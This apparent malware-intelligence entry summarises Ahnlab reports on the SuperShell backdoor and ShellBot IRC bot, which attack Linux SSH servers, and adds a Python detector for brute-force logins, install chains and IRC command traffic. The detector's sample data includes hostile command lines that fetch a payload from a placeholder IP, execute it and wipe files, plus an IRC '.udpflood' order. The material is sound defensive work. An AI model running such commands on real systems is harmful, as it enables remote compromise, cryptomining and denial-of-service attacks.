Source |
Contagio |
Identifier |
8575637 |
Publication date |
2024-09-12 21:22:50 (viewed: 2024-09-13 02:17:51) |
Title |
2024-09-12 SuperShell + 2023-03-13 ShellBot targeting Linux SSH servers: samples |
Text |
2024-09-12 Ahnlab: SuperShell malware targeting Linux SSH servers

SuperShell is a backdoor targeting Linux SSH servers, written in Go, which lets the same code base run on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, giving attackers remote command execution on compromised systems. The attack begins with brute-force and dictionary attacks against SSH servers using weak credentials such as "root/password" and "root/123456qwerty". Once access is gained, the attackers run a series of commands that download and install SuperShell using wget, curl, tftp, or FTP, with the download sources often hosted on other compromised servers.

SuperShell's obfuscation complicates analysis, but the malware can still be identified through specific internal strings and its runtime behaviour. The installation commands target directories such as /tmp, /var/run, /mnt, and /root, and often include clean-up actions that remove traces after installation (rm -r *). Typically the payload is a downloaded script or binary that is marked executable with chmod +x and then run (./ssh1); chmod +x sets the execute bit and does not raise privileges, the session already runs as the brute-forced account. The same pattern recurs across multiple command variants, showing the attackers' redundancy in ensuring a successful deployment.

The attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, which points to a dual-purpose attack: persistent control over the system combined with illicit cryptocurrency mining.

2023-03-13 Ahnlab: ShellBot malware being distributed to Linux SSH servers

On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware gains access by brute-forcing weak SSH credentials and then deploys its payload. Once installed, ShellBot connects to a command-and-control (C&C) server over the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.

Initial access: attackers scan for servers with SSH exposed (port 22) and use brute-force tools to guess weak or default credentials.
Installation: after gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.
IRC protocol: ShellBot uses IRC for C&C communication, letting it receive commands such as executing remote tasks or launching DDoS attacks without needing custom C&C infrastructure.
Customization: ShellBot is highly customizable, with variants such as "LiGhT's Modded perlbot v2" offering different capabilities and attack methods tailored by vari |
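Both reports describe the same initial access vector (SSH password brute force followed by a download, chmod, execute, clean-up chain) and, for ShellBot, plaintext IRC as the C&C channel. The following detection heuristics are an added example written for this page; they are not code from Ahnlab, Contagio, or either malware family. The sshd log lines, shell command lines, and TCP payload embedded below are constructed for illustration (the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges), and the thresholds are assumptions to tune per environment.

```python
"""Heuristics for (1) a burst of failed SSH passwords followed by a successful
password login from the same source, (2) a one-line download -> chmod -> execute
-> clean-up install chain, and (3) IRC verbs at the start of an outbound stream.
Added example: all sample data below is constructed, not from the Ahnlab reports."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd entries: five failures from one source, then a password success.
SAMPLE_AUTH_LOG = """\
Sep 12 21:20:01 srv sshd[1001]: Failed password for root from 203.0.113.7 port 50122 ssh2
Sep 12 21:20:02 srv sshd[1002]: Failed password for root from 203.0.113.7 port 50123 ssh2
Sep 12 21:20:03 srv sshd[1003]: Failed password for invalid user admin from 203.0.113.7 port 50124 ssh2
Sep 12 21:20:05 srv sshd[1004]: Failed password for root from 203.0.113.7 port 50125 ssh2
Sep 12 21:20:06 srv sshd[1005]: Failed password for root from 203.0.113.7 port 50126 ssh2
Sep 12 21:20:09 srv sshd[1006]: Accepted password for root from 203.0.113.7 port 50130 ssh2
Sep 12 21:25:00 srv sshd[1100]: Failed password for bob from 198.51.100.5 port 40000 ssh2
Sep 12 21:25:10 srv sshd[1101]: Accepted publickey for bob from 198.51.100.5 port 40001 ssh2
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)


def _parse_ts(ts):
    # syslog timestamps carry no year; a fixed year keeps deltas correct within one log.
    return datetime.strptime("2000 " + ts, "%Y %b %d %H:%M:%S")


def detect_bruteforce_logins(log_text, min_failures=3, window_seconds=300):
    """Return [(ip, user, failures)] for every accepted *password* login that was
    preceded by >= min_failures failed passwords from the same IP within the window.
    Key-based logins are ignored: the reports describe password guessing only."""
    failures = defaultdict(list)
    hits = []
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = _parse_ts(m["ts"])
        if m["result"] == "Failed" and m["method"] == "password":
            failures[m["ip"]].append(ts)
        elif m["result"] == "Accepted" and m["method"] == "password":
            recent = [t for t in failures[m["ip"]] if (ts - t).total_seconds() <= window_seconds]
            if len(recent) >= min_failures:
                hits.append((m["ip"], m["user"], len(recent)))
    return hits


# Stages of the install chain named in the report, as regexes over one shell command line.
CHAIN_STAGES = {
    "staging_dir": re.compile(r"\bcd\s+(/tmp|/var/run|/mnt|/root)\b"),
    "download":    re.compile(r"\b(wget|curl|tftp|ftp)\b"),
    "make_exec":   re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    "execute":     re.compile(r"(^|[;&|]\s*)\./\S+"),
    "cleanup":     re.compile(r"\brm\s+-[rRf]+\s"),
}

# Constructed command lines: two install chains, two legitimate admin one-liners.
SAMPLE_COMMANDS = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root; wget http://203.0.113.9/ssh1; chmod +x ssh1; ./ssh1; rm -rf *",
    "curl -O http://203.0.113.9/x.sh && chmod 777 x.sh && ./x.sh",
    "cd /tmp && wget https://example.invalid/release.tar.gz && tar xzf release.tar.gz",
    "chmod +x deploy.sh && ./deploy.sh",
]


def classify_command(cmd):
    """Return the set of chain stages a single command line matches."""
    return {name for name, rx in CHAIN_STAGES.items() if rx.search(cmd)}


def is_install_chain(cmd):
    """Download, chmod and execute together on one line is the minimum signature;
    a staging directory or trailing rm only adds confidence, so they are not required."""
    return {"download", "make_exec", "execute"} <= classify_command(cmd)


IRC_RE = re.compile(r"^(NICK|USER|JOIN|PRIVMSG|PING|PONG|MODE) ", re.MULTILINE)

# Constructed opening bytes of an outbound TCP stream to an arbitrary port.
SAMPLE_PAYLOAD = (b"NICK [bot]x42\r\nUSER x42 8 * :x42\r\nJOIN #ctrl\r\n"
                  b"PRIVMSG #ctrl :.udpflood 198.51.100.20 53 60\r\n")


def looks_like_irc(payload, min_verbs=2):
    """True when the stream opens with at least min_verbs distinct IRC verbs; this
    catches IRC-based C&C on non-standard ports, where a port filter would not."""
    text = payload.decode("ascii", errors="replace")
    return len(set(IRC_RE.findall(text))) >= min_verbs


if __name__ == "__main__":
    for ip, user, n in detect_bruteforce_logins(SAMPLE_AUTH_LOG):
        print(f"brute-force login: {user}@{ip} after {n} failures")
    for cmd in SAMPLE_COMMANDS:
        tag = "INSTALL CHAIN" if is_install_chain(cmd) else "no chain     "
        print(tag, sorted(classify_command(cmd)), cmd[:60])
    print("irc c2:", looks_like_irc(SAMPLE_PAYLOAD))
```

The command-line heuristic deliberately requires the three stages on one line because that is how the report describes the post-login commands; an attacker who splits them across separate interactive commands would need per-session correlation instead. Run against real data, the login detector expects syslog-format sshd output (journalctl -u ssh -o short works), and the IRC check expects the first few hundred bytes of a flow.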
Notes |
★★
|
Sent |
Yes |
Tags |
Malware
Tool
Threat
Mobile
|